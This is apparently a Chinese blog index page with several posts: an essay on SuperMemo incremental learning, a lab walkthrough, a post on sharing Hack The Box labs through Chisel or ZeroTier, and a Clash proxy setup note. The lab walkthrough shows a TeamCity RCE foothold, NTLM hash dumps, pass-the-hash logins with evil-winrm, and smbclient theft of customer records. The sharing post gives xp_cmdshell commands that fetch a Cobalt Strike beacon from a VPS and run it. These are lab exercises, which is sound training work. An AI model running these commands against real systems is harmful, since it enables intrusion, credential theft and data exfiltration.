Lamber's Blog

终身学习

发表于 本文字数: 214k 阅读时长 ≈ 13:01

我们的文化并不鼓励我们过多思考学习本身。相反,我们将其视为自然而然发生的事情。但学习本身必须由我们逐步培养的一系列技能组成;我们最初只具备其中一部分,然后慢慢发展其余。为什么没有更多人持续提升并优化学习技能?因为它的回报并非立竿见影,其效益需要长期积累。

—— Marvin Minsky

1. 什么是渐进学习?

本文描述了通往牢固终身知识的最快途径:渐进学习

渐进学习是截至撰写时(2013 年)学生可用的最快且最全面的学习方式。

渐进学习是一套基于计算机的技术整合,它能加速并优化从所有可想象的电子形式材料(甚至更广范围)中学习的过程。

目前,SuperMemo 是唯一实现渐进学习的软件。在 SuperMemo 中,学生向程序输入各种形式的学习材料和/或数据(文本、图片、视频、音频等),这些学习材料随后会逐步转化为可终身保持的持久知识。

[!note]
渐进学习帮助学生将所有形式的学习材料转化为持久且长久的记忆。

在渐进学习中,学生通常能记住其最高优先级材料的 95%。这些知识相对稳定,只要学习过程持续,就能在学生记忆中长久保持,甚至更久。

[!note]
渐进学习能轻松确保对终身优先学习材料保持 95%的记忆率(只要学生按照程序提供的规划坚持定期复习)。

与传统学习方法相比,维持高知识留存率的成本极低。例如在语言学习中,通过 SuperMemo 可保留受过教育的母语者词汇量,初期阶段每天仅需 20 分钟,后期仅需几分钟(假设原始学习集在 4 年内以每次 30-50 分钟的分散学习方式完成)。

[!note]
渐进学习能以时间成本的一小部分实现高记忆留存(相较课本学习而言)。

渐进学习得名于学习过程的渐进性。在渐进学习中,知识的各个方面都会得到定期处理,并且会有基于已有知识的新知识持续流入。在这种学习模式下,学生处于主导地位,自主决定应掌握哪些知识、何时掌握、详细程度如何、优先级高低以及期望的记忆/保持程度。例如,在单次学习会话中,学生可能学习几个地理知识点,发现几条健康生活法则,推导几个统计公式,阅读朋友博客的几段文字,处理几分钟的家庭视频集锦,为几张家庭照片添加注释,观看 YouTube 收藏中的几个片段,同时阅读与即将到来考试相关的几篇文章。换言之,所有知识领域都会根据兴趣和重要性保持同步并行扩展。

典型的学校教育强调少数几个知识领域,而忽视了所有其他领域。医学生可能会花几个月时间掌握解剖学,同时逐渐遗忘生物化学内容(反之亦然)。与此同时,他们找不到时间学习那些总是取决于特定人在特定情境下的当下重要议题。由于繁重学业负担带来的视野局限,学生可能永远没有时间去了解什么是渐进式学习。狭隘的视野和视角只会使学习材料的理性选择变得更加困难。

[!note]
渐进式学习与不合理的学校系统学习相反,后者在一个学期内仅重点学习少数几个知识领域(以牺牲其他同等重要的学习领域为代价)。

1.1 渐进学习概述

在渐进学习中,你通过以下步骤获取并保持知识:

  • 从各种电子和非电子来源导入知识(例如网络文章、YouTube 视频、音乐文件、相机拍摄的照片、电子邮件、扫描的纸质笔记等)
  • 对知识进行优先级排序以实现渐进式处理(例如物理知识优先级高,电影琐事优先级低等)。渐进式方法意味着以小块和小步骤处理知识
  • 逐步将学习材料转化为记忆中持久的知识。这种转化还可能生成一个易于搜索且注释详尽的计算机媒体档案,甚至无需成为学习过程的一部分
  • 在已获取知识的基础上进行创造性拓展(例如在渐进式写作问题解决等过程中)

[!note]
通过渐进学习,你可以整合所有知识来源,按照严格定义的目标和优先级,以所选的时间成本将信息转化为终身记忆。

1.2 渐进学习的组成部分

渐进学习工具因学习材料形式、媒介和目标的不同而存在显著差异。以下是渐进学习的主要组成部分:

借助渐进学习提供的丰富工具集,所有阅读、学习、浏览、归档和注释功能均可委托给 SuperMemo 处理。这远超常规学习范畴,涵盖个人笔记、家庭视频、音频及视频格式的讲座资料、YouTube 素材、家庭相册、日记、音频文件、纸质材料扫描件等各类内容。

渐进学习中最古老、最流行且最成熟的组成部分是渐进阅读。我们将以渐进阅读作为全面介绍其他渐进学习形式的切入点。

1.3 学习中干扰的价值

在渐进学习中,我们经常快速从一个主题切换到另一个主题。这种中断可能在一个学习日内多次发生。当人们初次了解这种渐进式方法时,会立即提出疑问: “为什么要中断?人类努力的核心原则不正是要彻底、坚持并善始善终吗?”

学习中中断的三大主要优势是:

  • 提升记忆:间隔学习早已被证明比时间上集中的聚合学习效率显著更高
  • 优化学习选择/优先级:除非学习材料由上级权威预先选定,否则学生自主选择需要优先级排序,这又需要预览。预览就是一种中断形式。定期中断允许动态调整优先级
  • 提升注意力:每当注意力下降时,除了明确暂停学习外,最简单的补救办法就是切换学习主题

至于缺点……根本不存在!简而言之:中断是可选的! 诚然,渐进式学习可能导致“学习不耐”和“渴望中断”,但这些从未被证明会产生不良影响,除了表明一旦采用渐进式学习,你可能再也不愿回到传统的“一次性啃完一本书”的学习方式。不过别忘了,学校教育也是渐进式的,只是节奏稍缓。当孩子们从地理课转到物理课,或合上书本结束一天学习时,学校就在运用中断策略。

一旦掌握渐进式学习的艺术,其优势远超简单的中断策略或间隔重复。以下是简要清单(详细讨论参见:渐进式学习的优势)。

  • 海量学习 —— 你能掌握远超自己想象的知识量
  • 95%的知识保留率 —— 几乎消除了遗忘问题
  • 终身记忆 —— 只要坚持基于间隔重复的定期复习计划,你的记忆将伴随一生
  • 全面学习各领域知识(而非像学校教育般仅专注于 2-4 个主修方向)
  • 通过适度消化细节内容并轻松整合解释性材料(如来自词典或百科全书),有助于更好地理解所学主题
  • 通过渐进式学习、间断学习、间隔安排以及新知识的穿插整合,更好地巩固知识结构。与普遍认知相反,渐进式学习有助于你在脑海中保持全局视野
  • 通过每次专注于单一问题且不遗漏任何细节,以及通过不断更换学习材料来弥补注意力缺陷,从而获得更好的注意力
  • 创造力 —— 通过以不可预测的顺序接触不同主题,你的创造力将大幅提升。例如,你可以将其应用于渐进式问题解决或[渐进式写作过程][https://help.supermemo.org/wiki/Incremental_learning#Incremental_writing](本文就是使用 SuperMemo 中的渐进式写作工具完成的)
  • 对抗混乱 —— 在 SuperMemo 中更容易解决矛盾,例如处理含有矛盾主张和发现的新研究时。不同于”现实生活”中记忆会让你在矛盾间摇摆不定,SuperMemo 不容忍信息差异。矛盾材料会逐渐趋同,直到你意识到需要决定真相的本质
  • 所有知识都得到良好优先排序
  • 所有知识都易于检索
  • 所有知识皆可量化(规模、记忆保留度、工作量等)
  • 无压力学习 —— 没有什么比确信不会遗漏任何细节更能解放思维,让你能专注于单一问题,同时将其他问题留待后续处理,从而高效学习
  • 乐趣 —— 一旦掌握了渐进学习,它真的可以成为你一天中最美好的时光,几乎没有其他世俗的快乐能像获取有用的新知识那样带给你如此多的满足感

简而言之,通过渐进学习,你学得更快,获取海量知识,记忆终身保留,几乎记住所有学过的内容,更好地理解事物,全方位协调发展,增强创造力,同时还能享受难以置信的乐趣!如果这听起来好得不像真的,请继续阅读下文或亲自尝试一下。详细解释请参阅:渐进学习的优势

1.4 干扰不是问题

在学习中,选择正确的学习资源是成功的第一步。一篇写得很好的文章会从第一段甚至第一句话就让你抓住基本概念。渐进阅读最适合以超文本或百科全书式风格撰写的文章。理想情况下,你读到的每个句子都对知识有所贡献,而不是脱离后续句子就毫无用处。

假设你想了解一些关于 Gamal Abdel Nasser 的知识。例如,你会将维基百科上关于Nasser的一篇文章导入到 SuperMemo 中。在第一句话中,你会发现”Gamal Abdel Nasser (1918 - 1970) was the second President of Egypt“。如果你对Nasser还不熟悉,可能只需知道他是埃及总统就满足了,然后可以放心地去阅读其他文章。这样,你可以推迟了解Nasser的历史角色,节省一些时间去了解其他内容,比如Shimon Peres是谁。当你第二次看到Nasser的文章时,可能会发现”He was followed by after President Muhammad Naguib and can be considered one of the most important Arab leaders in history“。这部分知识也是独立的,你可以耐心等待第三次接触Nasser的机会。当你下次再回来时,可能会认为关于Nasser的另一部分内容优先级较低:”Nasser was born in Alexandria“。你可以将这部分内容的复习安排在 2-3 年后。也许那时你对Nasser或Alexandria的兴趣会增加,使这部分知识变得相关。若不需要,您随时可以忽略(dismiss)或删除此类摘录(extract)。或者,您可以跳过几段,摘录(extract)更重要的句子:”In 1952, Nasser led the military coup against King Farouk I of Egypt“。即便您以数月为间隔单独阅读关于Nasser的句子,您的知识也会逐步扩展并日益巩固(尤其是当您使用填空测试(cloze deletions)时,这对于较长间隔的学习是必不可少的)。

当然,并非所有文本都如此适合渐进式阅读。例如,一篇研究论文可能会先向您抛出一堆方法细节,而将结果和结论留到最后。这种情况下,您可以先摘录(extract)摘要部分,将论文主体推迟到您认为摘要已充分消化后的某个时间段。之后,若您仍对该文章感兴趣,可以将方法部分安排到更远的未来(根据文章的结论决定是否阅读方法部分)。您可以将结果和讨论部分安排在较近的时间点,并继续阅读结论部分。

最难的文本可能不适合增量阅读。例如,一段软件代码可能需要整体分析才能揭示其有用含义。在这种情况下,当文本(此处指代码)出现在增量阅读过程中时,请对其进行分析并口头表达你的结论。然后,这些结论可以增量处理。你将根据认为重要的知识片段和易变的部分生成单独的问题。原始计算机代码仍可作为参考资料保留在你的收藏(collection)中。

在大学学习时,你会并行修读多门课程。这就是宏观版的渐进阅读。许多人喜欢频繁切换电视频道,用电视机上演一场混乱版的渐进视频(incremental video)。虽然频道切换并非推荐的学习方式,但它不会让你的大脑一片空白。另一个例子可见于那些习惯同时阅读多本小说的人。他们能并行阅读的小说数量受限于人类记忆的极限——当阅读间隔(intervals)过长导致记忆消退时,就会达到无法跟进情节的临界点。渐进阅读基于 SuperMemo 技术,从定义上就极大突破了健忘记忆的限制。在这个过程中,待处理文章数量可达数十万篇,而只要掌握基本技巧,你就不会陷入混乱。

1.5 渐进式学习的复杂性

与传统 SuperMemo 不同,渐进式学习需要相当多的经验和训练才能见效。然而,一旦你熟练掌握这种方法,你的投入将会得到数倍的回报。

渐进式学习是近三十年来发展技术的集大成者。它仍在不断完善中,目前仍相当复杂。掌握它需要数月时间培养技能,并需要制定可能需数年才能成熟的个人策略。此外,渐进式学习还要求精通专为专业用途优化的 SuperMemo 软件。因此,它对初学者并不友好。

用户抱怨 SuperMemo 的学习曲线陡峭。他们说得没错。SuperMemo 经过优化,让专业人士的生活更轻松。它让初学者的日子不好过,因为它从不为了美观或营销价值而牺牲学习效率。以优先级队列为例,几乎每个人都问为什么最有价值的文章优先级是 0%而非显而易见的 100%。他们质问:_”为什么 SuperMemo 总把事情搞得本末倒置?”_ 这话不无道理。然而,专业用户绝不会为了输入 99、98 或 97 的便利,而放弃用 1、2、3 标记最高优先级材料的方式。这些矛盾延缓了 SuperMemo 的普及,但一旦你成为专业人士,就会欣赏这种设计理念,并很可能成为终身拥趸。

2. 渐进阅读

2.1 渐进阅读简介

传统的线性阅读效率极低。这是因为文本的各个部分重要性不同:有些可以跳过,有些则应优先阅读。老式书籍正迅速被超文本取代。超文本能让你随时快速跳转到最重要的信息。超文本需要不同的写作风格——所有线性文本都默认读者熟悉前文内容,导致其语境贫乏;而超文本中的每个段落都具有语境独立性,所有专业术语和概念主要通过附加超链接进行解释。正如互联网帮助全球信息源实现去线性化那样,SuperMemo 也能帮助你对你决定导入的任何线性材料进行去线性化阅读。使用 SuperMemo 阅读时,你会看到线性文本被分解为章节、段落和单句的序列。SuperMemo 将帮助你为每个章节、段落或句子提供独立处理。

2.2 什么是渐进阅读?

The review process is handled by the proven spaced repetition algorithm known as the SuperMemo method.
渐进阅读是一种学习技巧,它使得同时阅读数千篇文章而不迷失成为可能。渐进阅读始于从电子来源(如互联网)导入文章。随后,学生提取出各篇文章中最关键的片段以供进一步复习。提取出的片段会被转化为问答形式。这些问答进而接受系统的复习与重复,以最大化长期记忆效果。复习过程由经过验证的 间隔重复算法 —— 即 SuperMemo 方法来管理。

[!note]
渐进阅读将电子文章转化为你记忆中持久的知识。 这种转化仅需最少的键盘和鼠标操作:

  • 输入:电子文章(例如从网络收集)
  • 输出:牢固记忆的知识(以问答形式定期进行测试)

在渐进阅读中,你以小块内容阅读文章。读完一篇文章的一部分后,接着阅读另一篇文章的部分内容,依此类推。你将所有重要的文本片段都引入 SuperMemo 的学习过程中。这样一来,即使数月后重新阅读,也不必担心遗忘文章的主线脉络。虽然单篇文章的进度可能较慢,但通过减少对次要文章的投入时间,增加对知识增益更大的文章的专注,你的学习效率将大幅提升。难度较高的文章可以暂缓,待你读完更易理解的解释性文章后再处理。最后同样重要的是,渐进阅读因其趣味性而提升效率!你永远不会感到厌倦。若不喜欢某篇文章,仅需读一句便可跳转到其他文章,从而始终保持注意力的高度集中。

注意! 渐进阅读起初可能显得复杂。但一旦掌握,你将开启一个超越预期的学习过程。你会惊讶于大脑能处理并记忆的数据量!观看 YouTube 上的这个简单演示

阅读全文 »

发表于 更新于 本文字数: 500 阅读时长 ≈ 2 分钟

入口

端口扫描,扫到以下端口开放

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
👉 root@racknerd-cfd9bbe ~ git:() docker run -it --rm --name rustscan rustscan/rustscan:2.1.1 -u 70000 -a 50.185.68.69 -- -sC -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 70000.
Open 50.185.68.69:80
Open 50.185.68.69:3306
Open 50.185.68.69:5672
Open 50.185.68.69:8111
Open 50.185.68.69:8080
Open 50.185.68.69:8081
Open 50.185.68.69:8383

分别访问并找历史CVE漏洞,最后发现 8111 端口的 TeamCity 可以利用,使用找到的 RCE exp GetShell

202410281705508

然后上传 C2 beacon 并上线该机器(反弹shell也是可以的,只不过用C2后续操作更加方便)

内网

用CS上线之后,使用 hashdump 命令 dump 本机的用户hash,拿到以下hash

202410281707695

1
2
3
4
5
6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
apache:1001:aad3b435b51404eeaad3b435b51404ee:ed813bb7cbb634bdd4b33e0c71d45cea:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mspadmin:1000:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:42bd78d638a1093d29abbfebda57f139:::

然后上传 SharpHound.exe 进行域信息收集,收集完毕之后在 BloodHound 中查看,发现 mspadmin 用户隶属于域 Administrator 组和 Domain Admins 组(任务:获取DA域管理员权限 - 完成)

202410281711413

这也就说明我们现在已经拥有了域内管理员权限了。然后上传并使用 fscan.exe 扫描内网资产,目的是定位域控和 FILES001 机器,所以这里使用 -nopoc 参数并指定常见端口进行扫描,命令如下:

1
fscan.exe -h 10.2.40.1/16 -nopoc -t 10 -p 88,135,389,445,636,5985

扫描结果如下图:

202410281714679

开放端口如下:

202410281717357

然后内网穿透并使用 evil-winrmpth 的方式登上去,成功登录,域管理员账户有效。

1
proxychains4 -q evil-winrm -i 10.2.40.50 -u mspadmin -H e20e81c5c06ccf288474c581f13423b9

202410281718396

202410281719090

文件服务器

现在只剩在 FILES001 中寻找敏感信息了。用 smbclienttree 命令可以快速浏览大量文件。最终在E盘中找到大量客户记录(custom records)。

1
2
3
4
5
6
7
8
9
10
11
12
proxychains4 smbclient.py gapfactories.local/mspadmin@10.2.40.90 --hashes ":e20e81c5c06ccf288474c581f13423b9"

# shares
ADMIN$
C$
E$
Insurances
IPC$
it

# use E$
# tree

202410281723769

202410281723014

下载下来进行查看,发现确实是客户的个人信息。(任务:窃取FILE001文件服务器上的用户数据 - 完成)

202410281725843

发表于 更新于 分类于 本文字数: 1.6k 阅读时长 ≈ 6 分钟

HTB pro labs限制了靶场的openvpn代理只能在一台机器上开启,
如果有第二台机器尝试连接靶场的openvpn文件,就会连接不上。那我如果要和朋友们一起打HTB pro labs要怎么办呢?

方案一、在 vps 上连接靶场,玩家登上 vps 进行游玩

最初的方案,是在 vps 连接靶场的openvpn代理,每个玩家直接登录该 vps 游玩。

但是这个方案很快就否决了,原因如下:

  1. vps 缺少GUI界面,而有些玩家比较习惯GUI界面操作
  2. 如果玩家顺势在 vps 上记录攻击线索或者安装一堆与靶场有关的工具,不同玩家之间就会互相剧透。
  3. 如果某玩家把 vps 的环境搞崩溃,如果回退环境,也会影响到其它玩家。

方案二、使用 Chisel 搭建 Socks5隧道,玩家使用 Socks5隧道进行游玩

在仔细查阅 Chisel 的官方文档之后,实现了一种通过 Chisel 代理实现多人共同游玩的方案:

chisel_collaboration_1

  1. 首先,在 vps 上启动openvpn连接靶场节点
  2. 然后,在 vps 上启动 Chisel 服务端
  3. 然后仿照单人游玩的操作,在入口机上使用 Chisel 客户端,连接 vps 上的 Chisel 服务端。
  4. 实际的操作都和单人游玩一样。成功在 VPS 和入口机之间建立了一条 Socks5 隧道。
  5. 这样所有人都可以通过设置本地socks代理,代理地址为 socks5 107.173.157.111 1080 。从而访问到靶场内部

虽然这种方案解决了多人一起玩的需求,但是前提是得有某一个人拿下入口机的权限,去入口机上架设socks5隧道。那如果想要让大家都真正的从零开始玩呢?比如从扫描靶机网段,探测入口机地址开始。

方案二点五、改进原 Chisel 搭建方案

chisel_collaboration_2

经过了一番思考,改进了一下上一版方案:

  1. 在 VPS 上,启动 Chisel 客户端,连接 VPS 上已经启动好的 Chisel 服务端
  2. 这样所有人通过设置本地 socks 代理,代理地址为 socks5 107.173.157.111 1081 。从而和靶场入口网段连通

方案三、使用Zerotire组网

虽然现在已经可以大家分别在本地,通过socks5代理访问靶场网段。但是又遇到了新的体验问题:

  1. Socks5隧道不能支持代理 ICMP 和 ARP 协议,直接导致无法使用 nmap 最快的 ICMP 扫描,入口网段的存活机器探测和开放端口扫描都会变得特别慢。

经过一番调查,采用 Zerotire 作为新一版的多人游玩方案。

  1. 在 VPS 上安装 Zerotire
  2. 在 Zerotire 控制台,设置路由转发规则 ,通过 VPS 去访问目的地址为 10.10.110.0/24 ,并为 VPS 设置 iptables 流量转发

这样所有玩家,直接加入 Zerotire 网络即可访问靶场网段。

同时,在 VPS上保留了一个 Chisel 服务端。当玩家打完入口机之后,可以使用 scp 将 Chisel 传到入口机上,
然后连接 VPS 的 Chisel 服务端启动一条socks5隧道用于后续内网穿透。和 Chisel 方案操作一致。

KALI-to-DANTE-WEB-NIX01-chisel-reverse-socks5

使用 Zerotire 方案已经解决了很大一部分的靶场稳定性和速度问题。进一步优化靶场速度,只能从 VPS 的位置考虑。

Hack The Box的总部位于英国伦敦,选择位于伦敦的 VPS 可以将 VPS 与靶场之间的通信延迟,降低到 10ms。

这时候再考虑 VPS 与国内之间的通信延迟,尽可能低即可。

原本为了实现低延迟,考虑选用CN2 GIA线路的 VPS,即从国外到国内走单独的直连线路。延迟最低,价格也最贵。是的,价格太昂贵了,只是为了用来搭建低延迟的多人协作靶场,属实是大材小用了。

然后,开始横向对比多家云服务器厂商的普通产品。最后选定了 vultr 家的伦敦节点 VPS,采用最抠门配置,1核1G。
每月6美元,并且可以用 paypal 余额支付,非常划算。

VPS 与 靶场直连的延迟平均为1.5ms:

vps-to-htb

本地 与 VPS 直连的延迟平均为170ms:

kali-to-vps

整体使用效果平均为172ms:

kali-to-htb

这样有个好处,如果还嫌本地和靶场交互操作慢,可以选择接梯子加速连上VPS,从VPS和靶场直接交互,延迟只有不到3ms。

多人情况下如何反弹shell?

由于多人一起打,本质上是通过一个公用vps将所有人的流量集体转发到HTB靶场内部,如下图:

flowchart LR
    A[player 1] --> B(vps)
    C[player 2] --> B(vps)
    D[player 3] --> B(vps)
    B(vps) -->|请求| E[HTB]
    E[HTB] -->|响应| B(vps)

所以想要反弹shell,只能反弹到vps上,并不能直接反弹到每个玩家的攻击机上。

那么有没有什么解决办法呢?

有,我们可以直接用一种更高级的“反弹shell”手段,即使用C2工具。

既然能反弹shell,说明一定能执行命令,那么就可以通过执行命令,下载C2工具的beacon然后直接将受害机上线。

以 CobaltStrike 为例,在 vps 上启动 CobaltStrike 的 teamserver

202410251157628

反弹shell 以 mssql 的 xp_cmdshell 为例,首先生成一个 CS 的 beacon,然后用python启动一个临时的web服务,使用 xp_cmdshell 下载 beacon 并执行

1
2
exec xp_cmdshell 'powershell.exe wget http://vps-ip:8000/cs.exe -OutFile C:\\Users\Public\\cs.exe'
exec xp_cmdshell 'C:\\Users\Public\\cs.exe'

这样每个玩家就可以在自己的攻击机上面,连接 teamserver 去控制受害机了。

注:如果想要让每个玩家之间互不剧透或者走捷径,即A玩家上线了一台受害主机之后,不想让B玩家直接操控这台主机(想让B玩家自己从头完整打一遍),可以找一个有权限分级的C2工具来用。

发表于 更新于 分类于 本文字数: 516 阅读时长 ≈ 2 分钟

方案一: Clash

优点: 简单,成本较低

缺点: 稳定性一般,延迟较高(日常300ms左右),多机器协作麻烦

阅读全文 »

发表于 更新于 本文字数: 328 阅读时长 ≈ 1 分钟

前提条件: 需要将本机的翻墙软件打开

以 Clash 举例,将本机的 Clash 的 Allow LAN 打开。并且记下 Clash 的监听端口(本文是 7890端口)

如果 Allow LAN 没有打开,则 Clash 只会监听 127.0.0.1 上的流量,打开之后 Clash 会监听所有的网络接口。

查看kali虚拟机网卡所处的网段,记下和kali所处网段对应的本机ip地址,如下:

1
2
本机_ip: 192.168.17.1
kali_ip: 192.168.17.128
阅读全文 »
0%